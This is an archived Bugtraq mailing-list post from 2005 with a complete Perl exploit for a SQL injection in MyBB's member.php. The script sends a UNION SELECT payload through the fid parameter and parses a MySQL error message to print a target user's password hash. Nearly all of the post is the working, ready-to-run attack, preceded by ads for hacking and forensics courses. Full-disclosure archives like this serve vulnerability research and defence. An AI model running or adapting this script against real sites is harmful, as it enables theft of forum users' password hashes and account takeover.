Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Member.php SQL Injection in MyBB

from [W7ED] Network Security [Permanent Link]
Subject: Member.php SQL Injection in MyBB
Date: 28 Aug 2005 01:16:42 -0000 

#!/usr/bin/perl -w
use LWP::Simple;
## Vitem ##
        if(!$ARGV[0]){
                print "############# MyBB Member.php SQL Injection 
##############\n";
                print "##                Coded By               #\n";
                print "##################################################  
########\n";
                print "## [+] Bug By W7ED  - W7ED[at]hotmail.com #\n";
                print "##################################################  
########\n";
                print "#           Exmp:- perl file.pl mybb.net /mybb userid    
#\n";
                print "##################################################  
########\n";
                exit;
        }
###########

my $host = 'http://'.$ARGV[0];

## User ID ##
        if(!$ARGV[1]){
                $ARGV[1] = 1;
        }
#############

my $userid = $ARGV[1];

print "[*] Trying $host\n";

## Forum Path ##
        if(!$ARGV[2]){
                $ARGV[2] = '/';
        }
################

$url = "$ARGV[2]/member.php?action=profile&uid=lastposter&fid=-1,') UNION 
SELECT password,password,password,password,password,passw  
ord,password,password,password,password,password,p  
assword,password,password,password,password,passwo  
rd,password,password,password,password,password,pa  
ssword,password,password,password,password,passwor  
d,password,password,password,password,password,pas  sword FROM users WHERE 
uid=$userid/*"; 
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
        $page =~ m/mySQL error: 1054<br>Unknown column '(.*?)'/ && print "[+] 
User ID Is $userid And Hash Is : $1\n";
print "[-] Unable to retrieve Hash\n" if(!$1);
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Member.php SQL Injection in MyBB, W7ED <=
Previous by Date:  [Full-disclosure] iDEFENSE Security Advisory 08.29.05: Symantec AntiVirus 9 Corporate Edition Local Privilege Escalation Vulnerability, iDEFENSE Labs
Next by Date:  AutoLinks Pro 2.1, none
Previous by Thread:  [Full-disclosure] iDEFENSE Security Advisory 08.29.05: Symantec AntiVirus 9 Corporate Edition Local Privilege Escalation Vulnerability, iDEFENSE Labs
Next by Thread:  AutoLinks Pro 2.1, none
Indexes:  [Date] [Thread] [Top] [All Lists]